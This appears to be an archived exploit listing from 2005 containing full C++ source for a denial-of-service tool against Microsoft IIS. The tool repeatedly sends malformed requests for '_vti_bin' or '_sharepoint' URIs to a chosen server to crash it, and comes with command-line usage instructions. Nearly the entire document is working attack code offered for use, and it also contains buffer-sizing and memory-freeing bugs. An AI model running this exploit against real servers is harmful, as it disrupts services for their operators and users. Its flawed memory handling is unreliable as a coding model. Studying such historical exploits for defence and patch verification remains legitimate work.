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MS Windows IIS Malformed HTTP Request Denial of Service Exploit (cpp)

🗓️ 29 Dec 2005 00:00:00Reported by LympexType 
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MS Windows IIS Malformed HTTP Request Denial of Service Exploit (cpp

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MS Windows IIS Malformed HTTP Request Denial of Service Exploit (cpp)
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/*
Name: Microsoft IIS Malformed URI DoS (_vti_bin, _sharepoint) Exploit
File: Microsoft.IIS.Malformed.URI.DoS.(_vti_bin,_sharepoint).cpp
Author: Lympex
Contact:
        .- Mail: lympex[at]gmail[dot]com
        .- Web: http://l-bytes.tk
Date: 20/12/2005
Info: http://www.securiteam.com/windowsntfocus/6E00E2KEUS.html
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib,"libws2_32.a")

SOCKET Connect(char *Host, short Port)
{
	/*make the socket*/
	WSADATA wsaData;
	SOCKET Winsock;
	/*structs*/
	struct sockaddr_in Winsock_In;
	struct hostent *Ip;

	/*init*/
	WSAStartup(MAKEWORD(2,2), &wsaData);
	/*asociate*/
	Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
	
	//check the socket
	if(Winsock==INVALID_SOCKET)
	{
		/*exit*/
		WSACleanup();
		return 1;
	}

	/*complete the struct*/
	Ip=gethostbyname(Host);
	Winsock_In.sin_port=htons(Port);
	Winsock_In.sin_family=AF_INET;
	Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));

	/*connection*/
	if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
	{
		/*exit*/
		WSACleanup();
		return 1;
	}

	return Winsock;
}

/*****************/
/* MAIN FUNCTION */
/*****************/
int main(int argc, char *argv[])
{
    printf("\n*******************************************************************");
    printf("\n* Microsoft IIS Malformed URI DoS (_vti_bin, _sharepoint) Exploit *");
    printf("\n*-----------------------------------------------------------------*");
    printf("\n*  Coded by Lympex: lympex[at]gmail[dot]com && http://l-bytes.tk  *");
    printf("\n*  Info: http://www.securiteam.com/windowsntfocus/6E00E2KEUS.html *");
    printf("\n*******************************************************************\n");    
    
    if(argc!=6)
    {
               printf("\n[+] Usage: %s <server.com> <port> <directory> <value> <interval(ms)>",argv[0]);
               printf("\n[+] Directories: \x22_vti_bin\x22 / \x22_sharepoint\x22");
               printf("\n    (Directory must be set to \x22Scripts & Executables\x22");
               printf("\n[+] Values: ~0, ~1, ~2, ~3, ~4, ~5, ~6, ~7, ~8, ~9\n");
               return -1;
    }
    
    BOOL Done=FALSE;
    unsigned int i;
    SOCKET DoS;
    char *Request;
    
    printf("\n[+] Doing DoS Attack...");
    Request=(char *)malloc((strlen("GET /")+strlen(argv[3])+strlen(argv[4])+strlen("/.dll/*\\\n\n"))*sizeof(char));
    memset(Request,0,sizeof(Request));
    //copy the request
    strcpy(Request,"GET /");strcat(Request,argv[3]);strcat(Request,"/.dll/*\\");strcat(Request,argv[4]);strcat(Request,"\n\n");
    
    //make a bucle to do the attack
    for(i=0;i<5;i++)
    {
                    DoS=Connect(argv[1],(short)atoi(argv[2]));
                    //check the socket
                    if(DoS==1)
                    {
                              Done=FALSE;
                              break;
                    }
                    send(DoS,Request,strlen(Request),0);
                    Sleep(100);
                    WSACleanup();
                    //check
                    if(i==4)
                    {
                            Done=TRUE;
                    }
                    Sleep((DWORD)atoi(argv[5]));
    }
    
    //check again
    if(Done==TRUE)
    {
                  printf("DONE");
    }else{
          printf("ERROR - Server down?");
    }
    
    LocalFree(Request);
    return 0;
}



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